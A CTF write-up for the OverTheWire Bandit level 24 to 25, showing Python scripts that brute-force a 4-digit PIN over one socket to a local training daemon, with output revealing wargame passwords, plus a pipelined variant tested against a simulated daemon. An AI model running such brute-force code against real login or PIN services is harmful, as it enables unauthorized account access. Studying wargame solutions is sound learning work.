
OverTheWire - Bandit: Level 24 to Level 25


Now something new comes into play: brute-forcing.

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, which is called brute-forcing.

You do not need to create new connections each time.

First, let's check out how the interaction with port 30002 works. To do that, we connect to the port and try it out by hand.

$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
$ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 1234
Wrong! Please enter the correct pincode. Try again.
$ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9999
Wrong! Please enter the correct pincode. Try again.

Since python3 is installed and usable, we can write a small Python script that connects to the port once and tries every pin over that single connection.

import socket

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as con:
    con.connect(('127.0.0.1', 30002))
    # Receive (and discard) the welcome message
    msg = con.recv(255).decode()
    for pin in range(0, 10000):
        # For some monitoring, print a message every 500 pins
        if pin % 500 == 0:
            print(f"reached pin {pin:04d}")
        # Prepare the brute-force line: the pin, simply an integer,
        # is zero-padded to match the expected 4-digit format
        to_send = f"VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar {pin:04d}\n"
        con.sendall(to_send.encode())
        # About 250 bytes should be enough to receive the reply at once.
        # (recv may in principle return a partial reply; on the loopback
        # interface with replies this short it arrives in one piece.)
        msg = con.recv(250).decode()
        # Since we do not know yet how the message looks in case of
        # success, we simply check for the failure message. If it is
        # not received, we assume the pin was accepted.
        if "Wrong!" not in msg:
            print(to_send)
            print("leads to:")
            print(msg)
            break

Again, we store the script in a temporary file under /tmp/ and then execute it. This takes some time (one round trip per guess), so one can grab some coffee and cake.

$ python3 /tmp/shoujin24.py
reached pin 0000
reached pin 0500
reached pin 1000
reached pin 1500
reached pin 2000
reached pin 2500
reached pin 3000
reached pin 3500
reached pin 4000
reached pin 4500
reached pin 5000
reached pin 5500
reached pin 6000
reached pin 6500
reached pin 7000
reached pin 7500
reached pin 8000
reached pin 8500
reached pin 9000
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9015

leads to:
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d

Exiting.

There it is! The pin is 9015 and the password of bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d.
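The script above sends one guess and waits for its answer before sending the next, so the run time is 10000 round trips. Because the daemon keeps the connection open, the guesses can be pipelined instead: write a batch of lines, then read exactly one reply line per guess, which keeps guess and reply paired no matter how TCP splits or merges the bytes. The following is an added example and not the writeup's script. It runs offline against a constructed stand-in daemon on an ephemeral loopback port that speaks the same prompt and reply strings seen in the session above; the pin and password it is seeded with are the values the writeup found, used here only as simulation data, and the function and variable names are this example's own.

```python
import re
import socket
import threading

# Constructed stand-in for the level's daemon so the example runs offline.
# Prompt and reply strings are copied from the writeup's session; the pin
# and the bandit25 password are the values the writeup found, used here
# purely as simulation data.
SIM_PASSWORD = "VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar"
SIM_PIN = 9015
SIM_NEXT_PASSWORD = "p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d"
WELCOME = ("I am the pincode checker for user bandit25. Please enter the "
           "password for user bandit24 and the secret pincode on a single "
           "line, separated by a space.\n")
WRONG = "Wrong! Please enter the correct pincode. Try again.\n"
CORRECT = ("Correct!\nThe password of user bandit25 is "
           f"{SIM_NEXT_PASSWORD}\n\nExiting.\n")


def serve_one(listener):
    """Answer one client line by line, the way the real daemon does."""
    conn, _ = listener.accept()
    listener.close()
    with conn, conn.makefile("r") as reader:
        conn.sendall(WELCOME.encode())
        for line in reader:
            parts = line.split()
            if (len(parts) == 2 and parts[0] == SIM_PASSWORD
                    and parts[1].isdigit() and int(parts[1]) == SIM_PIN):
                conn.sendall(CORRECT.encode())
                # Drain whatever the client already pipelined, then let it
                # hang up first so no data is lost to a reset.
                for _ in reader:
                    pass
                return
            conn.sendall(WRONG.encode())


def start_sim_daemon():
    """Start the stand-in daemon on an ephemeral loopback port; return the port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    threading.Thread(target=serve_one, args=(listener,), daemon=True).start()
    return listener.getsockname()[1]


def bruteforce_pin(host, port, password, batch_size=200):
    """Pipeline all 10000 guesses over one connection.

    Returns (pin, reply_line) for the guess the daemon accepted, or None.
    Every guess is answered with exactly one line, so one readline() per
    guess keeps the accounting exact; a file wrapper does the buffering.
    """
    with socket.create_connection((host, port)) as con, con.makefile("r") as reader:
        reader.readline()  # welcome banner
        for start in range(0, 10000, batch_size):
            pins = range(start, min(start + batch_size, 10000))
            con.sendall("".join(f"{password} {p:04d}\n" for p in pins).encode())
            for pin in pins:
                reply = reader.readline()
                if not reply:  # daemon closed without answering
                    return None
                if reply.startswith("Correct!"):
                    # The next line carries the bandit25 password.
                    return pin, reader.readline().strip()
    return None


def parse_password(reply_line):
    """Pull the password out of 'The password of user bandit25 is ...'."""
    match = re.search(r"\bis (\S+)$", reply_line)
    return match.group(1) if match else None


if __name__ == "__main__":
    port = start_sim_daemon()
    hit = bruteforce_pin("127.0.0.1", port, SIM_PASSWORD)
    if hit:
        pin, line = hit
        print(f"pin {pin:04d} -> {line}")
        print("password:", parse_password(line))
```

Against the real daemon you would point `bruteforce_pin` at `localhost` and 30002 instead of starting the simulation. The batch size is deliberately modest: a few kilobytes of replies per batch always fit in the socket buffers, so the client never blocks on a send while the daemon blocks on a reply, which is the deadlock a naive "send all 10000 lines, then read" approach can run into.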

Categories: #/writeups/; #/overthewire/

Tags: #/security/; #/hacking/; #/bash/; #/linux/; #/ctf/